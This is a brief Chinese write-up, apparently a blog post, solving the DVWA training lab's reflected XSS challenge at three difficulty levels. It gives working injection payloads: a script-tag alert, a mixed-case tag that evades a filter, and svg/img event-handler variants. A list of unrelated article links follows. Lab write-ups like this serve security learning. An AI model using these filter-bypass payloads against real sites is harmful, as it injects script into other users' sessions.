【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦

一、低级low

简单拿捏

复制代码
<script>alert(123)</script>

二、中级middle

源码过滤了script但是没有过滤大小写,改成大写S

复制代码
<Script>alert(123)</script>

三、高级high

比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行

复制代码
<svg onload=alert(123)>

<img src=x onerror=alert(123)>
相关推荐
iOS技术狂热者9 小时前
多图超详细安装flutter&Android Studio开发环境,并配置插件
websocket·网络协议·tcp/ip·http·网络安全·https·udp
盛满暮色 风止何安12 小时前
VLAN的高级特性
运维·服务器·开发语言·网络·网络协议·网络安全·php
故事与他64514 小时前
电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
java·开发语言·前端·javascript·安全·网络安全
SecPulse1 天前
流影---开源网络流量分析平台(四)(分析引擎部署)
运维·服务器·人工智能·网络安全·开源·流影
浩浩测试一下1 天前
网络安全之超强Linux信息收集:渗透测试与应急响应的基石(命令超强集合工作手册)
linux·运维·服务器·安全·web安全·网络安全·系统安全
SuperherRo1 天前
Web开发-JS应用&VueJS框架&Vite构建&启动打包&渲染XSS&源码泄露&代码审计
前端·javascript·vue.js·xss·源码泄露·启动打包
金丝猴也是猿1 天前
手机硬件检测详解:从版本信息到相机功能的全面指南
websocket·网络协议·tcp/ip·http·网络安全·https·udp
iOS技术狂热者1 天前
wireshark开启对https密文抓包
websocket·网络协议·tcp/ip·http·网络安全·https·udp